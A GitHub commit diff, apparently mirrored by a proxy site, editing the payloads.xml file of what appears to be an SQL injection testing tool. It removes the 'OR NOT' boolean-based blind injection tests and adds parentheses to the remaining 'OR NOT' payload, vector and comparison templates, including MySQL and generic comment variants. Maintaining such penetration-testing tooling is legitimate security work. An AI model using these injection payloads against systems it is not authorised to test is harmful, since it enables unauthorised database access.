Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 0764c4c

Browse files
stamparmstamparm
committed
parenthesis were missing; banning OR NOT from payloads
1 parent 41924a6 commit 0764c4c

1 file changed

Lines changed: 9 additions & 62 deletions

File tree

xml/payloads.xml

Lines changed: 9 additions & 62 deletions
Original file line numberDiff line numberDiff line change
@@ -503,109 +503,56 @@ Formats:
503503
</response>
504504
</test>
505505

506-
<test>
507-
<title>OR NOT boolean-based blind - WHERE or HAVING clause</title>
508-
<stype>1</stype>
509-
<level>2</level>
510-
<risk>3</risk>
511-
<clause>1</clause>
512-
<where>2</where>
513-
<vector>OR NOT [INFERENCE]</vector>
514-
<request>
515-
<payload>OR NOT [RANDNUM]=[RANDNUM]</payload>
516-
</request>
517-
<response>
518-
<comparison>OR NOT [RANDNUM]=[RANDNUM1]</comparison>
519-
</response>
520-
</test>
521-
522506
<test>
523507
<title>OR boolean-based blind - WHERE or HAVING clause</title>
524508
<stype>1</stype>
525509
<level>2</level>
526510
<risk>3</risk>
527511
<clause>1</clause>
528512
<where>2</where>
529-
<vector>OR [INFERENCE]</vector>
513+
<vector>OR NOT ([INFERENCE])</vector>
530514
<request>
531-
<payload>OR [RANDNUM]=[RANDNUM]</payload>
515+
<payload>OR NOT ([RANDNUM]=[RANDNUM])</payload>
532516
</request>
533517
<response>
534-
<comparison>OR [RANDNUM]=[RANDNUM1]</comparison>
518+
<comparison>OR NOT ([RANDNUM]=[RANDNUM1])</comparison>
535519
</response>
536520
</test>
537521

538-
<test>
539-
<title>OR NOT boolean-based blind - WHERE or HAVING clause (MySQL comment)</title>
540-
<stype>1</stype>
541-
<level>3</level>
542-
<risk>3</risk>
543-
<clause>1</clause>
544-
<where>2</where>
545-
<vector>OR NOT [INFERENCE]</vector>
546-
<request>
547-
<payload>OR NOT [RANDNUM]=[RANDNUM]</payload>
548-
<comment>#</comment>
549-
</request>
550-
<response>
551-
<comparison>OR NOT [RANDNUM]=[RANDNUM1]</comparison>
552-
</response>
553-
<details>
554-
<dbms>MySQL</dbms>
555-
</details>
556-
</test>
557-
558522
<test>
559523
<title>OR boolean-based blind - WHERE or HAVING clause (MySQL comment)</title>
560524
<stype>1</stype>
561525
<level>3</level>
562526
<risk>3</risk>
563527
<clause>1</clause>
564528
<where>2</where>
565-
<vector>OR [INFERENCE]</vector>
529+
<vector>OR NOT ([INFERENCE])</vector>
566530
<request>
567-
<payload>OR [RANDNUM]=[RANDNUM]</payload>
531+
<payload>OR NOT ([RANDNUM]=[RANDNUM])</payload>
568532
<comment>#</comment>
569533
</request>
570534
<response>
571-
<comparison>OR [RANDNUM]=[RANDNUM1]</comparison>
535+
<comparison>OR NOT ([RANDNUM]=[RANDNUM1])</comparison>
572536
</response>
573537
<details>
574538
<dbms>MySQL</dbms>
575539
</details>
576540
</test>
577541

578-
<test>
579-
<title>OR NOT boolean-based blind - WHERE or HAVING clause (Generic comment)</title>
580-
<stype>1</stype>
581-
<level>3</level>
582-
<risk>3</risk>
583-
<clause>1</clause>
584-
<where>2</where>
585-
<vector>OR NOT [INFERENCE]</vector>
586-
<request>
587-
<payload>OR NOT [RANDNUM]=[RANDNUM]</payload>
588-
<comment>--</comment>
589-
</request>
590-
<response>
591-
<comparison>OR NOT [RANDNUM]=[RANDNUM1]</comparison>
592-
</response>
593-
</test>
594-
595542
<test>
596543
<title>OR boolean-based blind - WHERE or HAVING clause (Generic comment)</title>
597544
<stype>1</stype>
598545
<level>3</level>
599546
<risk>3</risk>
600547
<clause>1</clause>
601548
<where>2</where>
602-
<vector>OR [INFERENCE]</vector>
549+
<vector>OR NOT ([INFERENCE])</vector>
603550
<request>
604-
<payload>OR [RANDNUM]=[RANDNUM]</payload>
551+
<payload>OR NOT ([RANDNUM]=[RANDNUM])</payload>
605552
<comment>--</comment>
606553
</request>
607554
<response>
608-
<comparison>OR [RANDNUM]=[RANDNUM1]</comparison>
555+
<comparison>OR NOT ([RANDNUM]=[RANDNUM1])</comparison>
609556
</response>
610557
</test>
611558

0 commit comments

Comments
 (0)